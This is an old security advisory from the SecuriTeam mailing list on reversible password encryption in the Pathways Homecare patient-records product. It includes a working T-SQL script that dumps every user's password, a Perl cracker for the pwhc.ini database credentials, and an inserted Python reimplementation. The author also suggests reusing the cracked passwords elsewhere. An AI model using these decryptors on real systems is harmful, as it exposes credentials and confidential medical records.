[NT] Weak Encryption in Pathways Homecare

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 11 Dec 2001 22:48:30 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Weak Encryption in Pathways Homecare
------------------------------------------------------------------------

SUMMARY

 
Pathways Homecare (<http://caci.strategicsystems.com/caci/corporate/prodport2.nsf/All+Products/697662375BF0D9E8852565E1006E9DB7?OpenDocument>) may give attackers access to certain configuration files, and enables them to achieve 'sa' or equivalent account privileges for SQL Server 7.0 (MSDE). In addition, it is possible to retrieve application passwords for all users of the application.

DETAILS

Vulnerable systems:
Pathways Homecare version 6.5

According to the vendor, McKesson's Pathways Homecare is the first
comprehensive client/server application introduced to the homecare market
for advanced information management.

This is a product that stores patient information, billing information,
and medical records for people who receive health care in their homes.
Each clinician has a laptop and all the laptops are periodically
synchronized with a central database. Additionally there is a desktop
client for administrative staff. Both the laptops and the central
database server run Microsoft SQL Server 7.0.

Workstation and laptop users alike get their connection information from a
file named pwhc.ini that contains an encrypted username and password. For
workstations, the file is stored on a central fileserver and the account
is likely to have DBO level permissions on the central database. For the
laptops, this file is stored locally and the account used is either 'sa'
on the local version of SQL or has equivalent permissions.

As you have probably guessed by now, the vendor has decided to use their
own encryption algorithm:

1) They determine whether the username/password is even or odd in length.
2) If odd, they use the following sequence of numbers: 3,8,5,10,7...
3) If even, the sequence is 7,4,9,6,11...
4) Then they reverse the username/password and subtract the corresponding
number in the sequence from each byte.

Obviously, this encryption algorithm can be easily reversed.

This allows anyone who can get access to the config files for Pathways
Homecare to read and modify confidential patient information, as well as
enjoy sa privileges on laptop clients. The next stage is to obtain access
to the data.

Unfortunately the vendor uses the exact same encryption method, with
slightly different key sequences, for this additional layer of security:
the application users' passwords stored in the usr table. It is possible
to retrieve the username and password for every user in about 2 seconds.
The T-SQL code to do this follows:

SET NOCOUNT ON
DECLARE @evenkey varchar(15)
DECLARE @oddkey varchar(15)
DECLARE @key varchar(15)
DECLARE @cryptstr varchar(15)
DECLARE @position tinyint
DECLARE @length tinyint
DECLARE @usrID varchar(30)

DECLARE pwd_cursor CURSOR FOR SELECT usrID, pwd FROM usr
OPEN pwd_cursor
FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
-- key letters; each key byte is (ASCII(letter) - 65), so 'C' = 2
SET @evenkey = 'FDHFJHLJNLPNRP'
SET @oddkey = 'CGEIGKIMKOMQOSQ'

WHILE (@@FETCH_STATUS = 0)
BEGIN
   SET @position = 1
   SET @length = datalength(@cryptstr)
   -- odd and even length values use different key sequences
   IF ((@length % 2) = 1) SET @key = @oddkey
   ELSE SET @key = @evenkey

   -- walk the stored value from its last byte, adding the key byte back
   WHILE (@position <= @length)
   BEGIN
      SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1,
          CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65)
          + ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1))))
      SET @position = @position + 1
   END
   PRINT @usrID + ' : ' + @cryptstr
   FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
END
CLOSE pwd_cursor
DEALLOCATE pwd_cursor
GO

Bang! Out come the passwords and it is time to see if the user uses the
same password elsewhere.
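The four-step pwhc.ini scheme described above and the usr-table variant walked by the T-SQL, as an added Python model that is not part of the advisory: it generates both keystreams so they can be inspected and round-tripped, and it follows the advisory's decryptor, which reverses the string again after adding the key. The sample credential and the wrap-around modulo 256 are assumptions of this example.

```python
# Added example (not from the advisory): the pwhc.ini keystream from the
# four steps above and the usr-table variant from the T-SQL, modelled so
# both sequences can be inspected and round-tripped. Sample values are
# constructed.

DB_ODD_KEY = "CGEIGKIMKOMQOSQ"    # key letters from the T-SQL, odd length
DB_EVEN_KEY = "FDHFJHLJNLPNRP"    # key letters from the T-SQL, even length


def ini_key_sequence(length: int) -> list[int]:
    """Keystream for pwhc.ini: odd length 3,8,5,10,7..., even 7,4,9,6,11...
    Terms alternate +5/-3 (odd) or -3/+5 (even). Nothing depends on a
    secret, so the same fixed 'key' protects every installation."""
    seq, k = [], 3 if length % 2 else 7
    steps = (5, -3) if length % 2 else (-3, 5)
    for i in range(length):
        seq.append(k)
        k += steps[i % 2]
    return seq


def db_key_sequence(length: int) -> list[int]:
    """Keystream for the usr table: key letters minus 'A' ('C' -> 2)."""
    letters = DB_ODD_KEY if length % 2 else DB_EVEN_KEY
    if length > len(letters):
        raise ValueError("value longer than the product's fixed key")
    return [ord(c) - ord("A") for c in letters[:length]]


def shift(text: str, seq: list[int], sign: int) -> str:
    """Reverse, add sign*seq[i] to byte i, reverse back. The advisory's
    decryptor reverses again after adding the key, so encryption is the
    same walk with the key subtracted (wrap mod 256 like a byte would)."""
    rev = text[::-1].encode("latin-1")
    out = bytes((b + sign * k) % 256 for b, k in zip(rev, seq))
    return out[::-1].decode("latin-1")


def ini_encrypt(plain: str) -> str:
    return shift(plain, ini_key_sequence(len(plain)), -1)


def ini_decrypt(cipher: str) -> str:
    return shift(cipher, ini_key_sequence(len(cipher)), +1)


def db_decrypt(cipher: str) -> str:
    return shift(cipher, db_key_sequence(len(cipher)), +1)
```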

Vendor status:
The vendor was contacted (security-alert@mckesson.com) 2 weeks ago. An
immediate response was received stating that the message had been
forwarded to the appropriate parties within the Pathways Homecare product
group. No further response was received.

Exploit:
#! /usr/bin/perl -w
####################################################################
# pwhc_crack.pl -- Extracts a password from a Pathways Homecare PWHC.ini file
####################################################################

use strict;

open (PWHC, "pwhc.ini") or die "Unable to open .ini file: $!";
while (<PWHC>) {
   chomp;
   # each line looks like Name=value; only the two credential keys matter
   if ($_ =~ /^UserID/) { print "UserID: ", decrypt($_), "\n"; }
   if ($_ =~ /^Password/) { print "Password: ", decrypt($_), "\n"; }
}
close (PWHC);

####################################################################
# The sad thing is that this isn't the worst part of product. It's not
# that the vendor is using weak encryption, it's that the quality of
# the encryption is better than most of their code.
####################################################################

sub decrypt {
   my $line = shift;
   my $counter = 0;
   my $key;
   # split "Name=value" on the first '=' only; the value may contain '='
   my @cryptstr = split /=/, $line, 2;
   # the product reversed the string before subtracting, so reverse first
   my @revstr = unpack("c*", (scalar reverse $cryptstr[1]));
   if(@revstr % 2) {
      # odd length: sequence 3,8,5,10,7,... (alternately +5 and -3)
      $key = 3;
      while ($counter < @revstr) {
         $revstr[$counter] += $key;
         $counter++;
         $key += ($counter % 2) ? 5 : -3;
      }
   }
   else {
      # even length: sequence 7,4,9,6,11,... (alternately -3 and +5)
      $key = 7;
      while ($counter < @revstr) {
         $revstr[$counter] += $key;
         $counter++;
         $key += ($counter % 2) ? -3 : 5;
      }
   }
   # reverse back to get the original byte order
   return pack("c*", (reverse @revstr));
}

__END__

ADDITIONAL INFORMATION

The information has been provided by shoeboy (shoeboy@adequacy.org).

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


